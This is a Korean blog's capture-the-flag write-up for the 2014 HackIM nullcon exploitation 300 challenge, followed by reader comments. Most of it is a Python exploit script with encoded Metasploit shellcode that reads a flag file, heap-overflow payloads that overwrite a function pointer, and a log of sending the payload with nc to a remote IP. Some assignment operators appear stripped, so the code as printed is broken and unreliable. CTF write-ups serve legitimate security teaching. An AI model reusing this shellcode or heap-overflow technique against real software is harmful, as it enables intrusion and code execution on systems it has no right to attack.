HackIM nullcon exploitation 300 write-up
.
binary :
import time
import struct
# createheap -> allocate_big_heap -> strcpy -> deleteheap(vtable)
# simple function pointer overwrite
# heap overflow
"""
/*
* linux/x86/read_file - 97 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* VERBOSE=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependSetresgid=false, PrependSetregid=false,
* PrependSetgid=false, PrependChrootBreak=false,
* AppendExit=false, PATH=flag.txt, FD=4
*/
"""
shellcode = ("\xb8\xf6\x7e\xa8\x82\xdd\xc6\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x12\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x14\x8b\x43\xb4\x60"
"\x71\x94\xb9\x90\x21\xa5\x70\x5d\x55\x4c\x41\xe5\x55\x4f\x46"
"\x15\xd3\xa8\xcf\xec\x59\x36\xc0\x0e\x9e\xfa\x60\x87\x5c\xbc"
"\x65\x97\x60\xbd\xde\x93\x60\xbd\x20\x56\xe0\x05\x21\x68\xe1"
"\x75\x99\x68\xe1\x75\xdd\xa5\x61\x9d\x18\xca\x9d\xa1\xc5\x58"
"\x03\x39\x24\xd4\xbb\xb1\x38")
p = lambda x : struct.pack(" pr = 0x080487e8 def createheap(): # create heap payload = "CR" payload = "A"*38 payload = p(0x64) payload = "\n" return payload def deleteheap(): # delete heap #payload = "DE" payload = "\xeb\x50" # short jump payload = "\x90" * 38 payload = p(0x32) payload = "\x90" * 0x50 payload = shellcode payload = "\n" return payload def biggheap(size): # allocate big heap payload = "RE" payload = "A" * 38 payload = p(0xc8) payload = "A" * 36 payload = p(size) payload = "\n" payload = "B" * (size - 4 - 4) payload = p(pr) # ret here payload = "\n" return payload def overflow(): #lead to buffer overflow payload = "CP" payload = "A" * 38 payload = p(0x12c) payload = "\n" return payload exploit = "" exploit = createheap() exploit = biggheap(0x110) exploit = overflow() exploit = deleteheap() # trig vuln #print exploit f = open("ex3.txt", "wb") f.write(exploit) f.close() """ root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# (cat a.txt) | nc 23.23.190.205 8888 637c0c259175d230b08e3e589278ceeb """
바이너리를 분석하고 heap overflow를 유도시키고 function table을 덮어 씌우고 덮어씌운 주소를 호출하도록 유도하는
exploit 코드를 작성한다
flag : 637c0c259175d230b08e3e589278ceeb
'0x10 정보보안 > 0x15 System' 카테고리의 다른 글
HackIM nullcon exploitation 100 write-up [exploit] (0) | 2014.01.27 |
---|---|
HackIM nullcon exploitation 400 write-up [exploit] (5) | 2014.01.27 |
HackIM nullcon exploitation 300 write-up (4) | 2014.01.27 |
HackIM nullcon exploiation 200 write-up [exploit] (0) | 2014.01.27 |
URLDownloadToFile Shellcode Analysis (3) | 2014.01.23 |
2013 Plaid CTF ropsaurusrex Exploit (1) | 2013.11.12 |
안녕하세요. 문제풀어보다가 막혀서 이렇게 댓글답니다 ㅎㅎ
gdb를 이용해서 동적분석 하고싶은데 이런 문제는 어떻게 동적으로 붙여야 되죠?
다른문제처럼 바이너리 내에 socket이 들어있지도 않아서 어떻게해야될지 ㅜㅜ
답변 기다릴게요 :D
로컬에서 분석하시거나 리모트돌리실려면 http://research.hackerschool.org/Datas/Research_Lecture/remote1.txt 참고해주세영
remote2.txt도 있습니다.
이시간에 답변이라니....감사합니다 ^^
안녕하세요. 이해가 안되는게 있어서 질문 드립니다.
biggheap 에서 malloc(v8) 의 v8를 덮는 부분을 어떻게 구하신건지 궁금합니다. IDA로 계속 살펴봐도 저 v8 덮는 부분을 어떻게 구하는건지 모르겠네요..